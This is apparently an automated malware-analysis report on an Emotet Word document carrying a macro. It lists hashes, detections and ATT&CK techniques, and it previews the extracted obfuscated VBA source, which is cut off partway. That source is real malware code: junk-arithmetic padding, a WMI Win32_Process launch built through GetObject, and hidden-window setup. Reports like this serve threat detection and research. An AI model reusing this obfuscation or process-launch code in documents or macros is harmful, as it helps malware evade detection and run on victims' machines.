Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 f8570802bf760639…

MALICIOUS

Office (OLE)

Size: 193.1 KB
Created: 2019-02-22 08:22:00
Authoring application: Microsoft Office Word
First seen: 2019-02-26
MD5: db600c7d188e3c832605466dde5bcab9
SHA-1: 5d665035ad4158b229e837a1cffd943b46e6107a
SHA-256: f8570802bf76063969c8a167544fd283bba43cfd7ce0a1d2f405b098fbfe3f73
Risk Score: 222

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6865930-0', indicating it's likely part of the Emotet family. High-severity heuristics confirm the presence of an AutoOpen VBA macro that uses GetObject, a common technique for executing malicious code. The macro's obfuscated nature suggests it's designed to download and execute a second-stage payload, consistent with Emotet's behavior.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6865930-0 (critical) CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6865930-0
  • VBA macros detected (medium, 3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro (high) OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call (high) OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 43093 bytes
SHA-256: 1049ad478935a16ad0ff33b7186a852f6dd2320f74eafbfdfe3dab09ec2b7aa3

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "v290062"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "k655547"
Function Q50_1_65()
   Select Case A_962_
         Case 128000551
U310_1_9 = (o632_4 * Fix(451547558 / CBool(q26___))) - R821562 / Oct(892430490) / 798610692 + CStr(S49255_) - 919329677 + ChrB(o207____)
End Select
   Select Case b3367648
         Case 390220808
G675_5 = (A534_58 * Fix(100586583 / CBool(p67_12_))) - Y94____6 / Oct(941363895) / 274720910 + CStr(h2__95) - 962752476 + ChrB(w5619_)
End Select
   Select Case N_19_8_7
         Case 773858388
E1534__ = (F81__937 * Fix(966092511 / CBool(Z438__66))) - Z1537_ / Oct(18006073) / 735646295 + CStr(w079__4_) - 96629916 + ChrB(Y552___)
End Select
   Select Case C8_330
         Case 588431693
b___4818 = (d9224132 * Fix(174990940 / CBool(q0937894))) - U56296 / Oct(212369674) / 463336692 + CStr(n82_7_69) - 138569379 + ChrB(V_1_14_)
End Select
   Select Case K__3_60
         Case 83387527
z8_77_6 = (m20__66 * Fix(285742593 / CBool(n468_4))) - S4____81 / Oct(35424484) / 141128078 + CStr(d_8_26) - 525199804 + ChrB(o72_1_59)
End Select
   Select Case K77_16_
         Case 70757302
F54__61 = (A30395 * Fix(16570273 / CBool(h460__58))) - B__0_12 / Oct(80257334) / 664481382 + CStr(I14487) - 545313917 + ChrB(a12_61_7)
End Select
   Select Case q_1075
         Case 946927337
z2_91_ = (j3__8_38 * Fix(760523264 / CBool(F5_497))) - w_10_70_ / Oct(975429481) / 550262089 + CStr(U413053) - 265753525 + ChrB(J__0__1_)
End Select
End Function
Function j27125(K_20__, F_197_7)
On Error Resume Next
   Select Case O01_164
         Case 873956902
B___997 = (u00_6_70 * Fix(487417620 / CBool(B30040_))) - I532_5 / Oct(500809999) / 48936720 + CStr(j_271_) - 596153030 + ChrB(B90_647)
End Select
   Select Case W7_130
         Case 223897058
o0_9_9__ = (f_3796_ * Fix(761189105 / CBool(B23_4_5))) - t42879 / Oct(360385596) / 613036928 + CStr(c40_3_5) - 216577373 + ChrB(j6____0)
End Select
   Select Case w__5_4
         Case 750920478
U5479141 = (w532__8 * Fix(272730906 / CBool(X5327513))) - H343_746 / Oct(394406016) / 758842230 + CStr(T_8___2) - 381245754 + ChrB(w57132_5)
End Select
R_845_ = N5_1_6 + "winmgmts:Win32" + K_191_49 + "_ProcessStartup" + I26734_
   Select Case s5_2467
         Case 336586192
m035595 = (M__230 * Fix(173137779 / CBool(I__30_))) - b50737_ / Oct(99768988) / 965934274 + CStr(z0___43) - 826917769 + ChrB(j62_53)
End Select
   Select Case X0735832
         Case 311110205
D38_46 = (p357693 * Fix(163607865 / CBool(H3_8210))) - L57_93 / Oct(939019488) / 435634450 + CStr(c2176_0) - 159762297 + ChrB(c25093)
End Select
h495__94 = F8315_4 + "winmgmts:Win32" + l57398_ + "_Process" + l896_6
   Select Case n_18_1
         Case 899693318
z_04562 = (Q921__1 * Fix(310694814 / CBool(T59_0_0))) - P5____93 / Oct(917397212) / 228855129 + CStr(i_621_) - 763215146 + ChrB(Z0_761)
End Select
   Select Case a3832_5
         Case 634198281
r683_2_2 = (l_2852 * Fix(999227152 / CBool(M184668))) - U7_9_6 / Oct(200610008) / 137888759 + CStr(U_7_24) - 703922535 + ChrB(A_1_04)
End Select
Set j__258 = GetObject(R952_369 + R_845_ + P_2212)
   Select Case B36666
         Case 465359319
F_41_9 = (m4_065_1 * Fix(601377962 / CBool(V547_2))) - z5__97 / Oct(173020425) / 21945179 + CStr(B090_6) - 887111453 + ChrB(h_85_85)
End Select
   Select Case l84_33
         Case 486346972
q5_23_ = (P01523 * Fix(506262941 / CBool(j6_17__))) - Q_31__97 / Oct(954577258) / 897540014 + CStr(a9_5836) - 652356721 + ChrB(k_78211)
End Select
j__258.ShowWindow = z590_4 + 311833 - 311833 + l039_3
   Select Case Q48__374
         Case 645357063
h90659 = (i___09 * Fix(8181473 / CBool(T_361_))) - N_3_84 / Oct(104279817) / 702145494 + CStr(W03_696) - 311852797 + ChrB(Z_6_15_)
End Select
   Select Case i__15_
         Case 349205751
S_16417 = (P__145 * Fix(560709850 
... (truncated)